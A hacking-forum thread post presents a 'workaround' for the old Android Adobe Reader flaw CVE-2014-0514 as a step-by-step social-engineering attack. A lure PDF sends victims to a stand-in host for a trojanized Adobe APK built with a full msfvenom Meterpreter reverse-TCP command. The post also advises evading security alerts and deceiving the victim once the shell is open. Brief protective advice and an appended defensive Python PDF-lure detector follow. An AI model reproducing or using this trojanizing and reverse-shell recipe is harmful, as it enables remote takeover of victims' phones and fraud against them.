Thread: CVE-2014-0514 not working on updated Android devices? Firing a workaround!

Status
Thread closed to further replies.

Netcat

Jade User
17 January 2022
CVE-2014-0514 is an old Android vulnerability that leveraged a flaw in Adobe Reader <11 where proper checks of JavaScript inputs were not performed. The vulnerability opened opportunities for exploitation with SE, as there are so many excuses to persuade someone into opening a PDF, thus very important.

They made this vulnerability so hard to exploit that you have to create a lab with a VM carrying Android 4.0, the vulnerable application and a crafted .pdf.
If one of these requirements is missing, the exploit will fail. I tried myself to use it against my Android 12 with Adobe 11.0; it didn't work even with the vulnerable app installed correctly. You can't just execute JavaScript code against old Adobe 11 if it is installed on a modern Android device, apparently.

The proverb says "If you can't go against it, then go with it".

Step 1. Download any version of Adobe, save to desktop, rename it "adobe.apk";

Step 2. Download and install OpenJDK, apktool, apksigner and zipalign on your device;

Step 3. Create manually a pdf document and call it Example.pdf, open it, and type inside "You need Adobe to view this content, get Adobe for Android: https://bad-server.com"

Step 3. Where bad-server.com is your own webserver, you are hosting on it a malicious version of Adobe injected with the following command "msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -x adobe.apk -o evil-adobe.apk", the victim is tricked into downloading and installing a trojanized version of Adobe to display the content of your pdf.

Step 4. Once you found a way to bypass security alerts and general security policy, you finally get your reverse shell, use it to quickly swap the pdf of the victim with an actual "unlocked" copy to fool him into thinking that Adobe unlocked the pdf (of course)

How to protect against this type of SE attack? Just don't trust pdfs claiming that they "desperately need" Adobe to work. Android can just read pdfs with basekit features, such as opening 'em in web browser, you don't truly need Adobe for pdfs unless you are actively working on 'em.
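
A defender-side check for the lure described in this thread, added here as an example and not part of the original post: it inflates a PDF's Flate streams, pulls out the literal strings, and flags viewer-install wording that sits next to a link outside an allowlist. `TRUSTED_HOSTS`, the wording pattern and the function names are assumptions to adapt.

```python
import re
import zlib
from urllib.parse import urlparse

# Assumption: hosts from which a viewer-install link is acceptable in your environment.
TRUSTED_HOSTS = {"play.google.com", "www.adobe.com", "get.adobe.com"}

STREAM = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
PDF_STRING = re.compile(rb"\(((?:\\.|[^()\\])*)\)", re.S)  # literal strings: (text) Tj, /URI (...)
URL = re.compile(rb"https?://[^\s()<>\\]+", re.I)
# Wording that tells the reader to obtain a viewer before the content will display.
LURE = re.compile(rb"\b(need|requires?|install|download|get)\b[^.]{0,40}?\b(adobe|reader|viewer)\b", re.I)


def visible_strings(raw: bytes) -> bytes:
    """Join the literal strings found in the file and in its Flate streams."""
    chunks = [raw]
    for m in STREAM.finditer(raw):
        try:
            # decompressobj tolerates a clipped trailer, unlike zlib.decompress
            chunks.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue  # other filter or encrypted stream: nothing to inflate
    return b" ".join(s for c in chunks for s in PDF_STRING.findall(c))


def host(url: str) -> str:
    try:
        return urlparse(url).hostname or ""
    except ValueError:
        return ""


def assess_pdf(raw: bytes) -> dict:
    text = visible_strings(raw)
    urls = sorted({u.decode("latin-1").rstrip(".,;") for u in URL.findall(text)})
    untrusted = [u for u in urls if host(u) not in TRUSTED_HOSTS]
    apk_links = [u for u in urls if u.lower().split("?")[0].endswith(".apk")]
    lure = bool(LURE.search(text))
    return {
        "lure_text": lure,
        "untrusted_urls": untrusted,
        "apk_links": apk_links,
        # Flag a direct APK link, or viewer-install wording next to an off-allowlist link.
        "suspicious": bool(apk_links) or (lure and bool(untrusted)),
    }
```

Text drawn with custom font encodings or held in encrypted streams is not visible to this scan, so a clean result only means this particular pattern was not found.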
 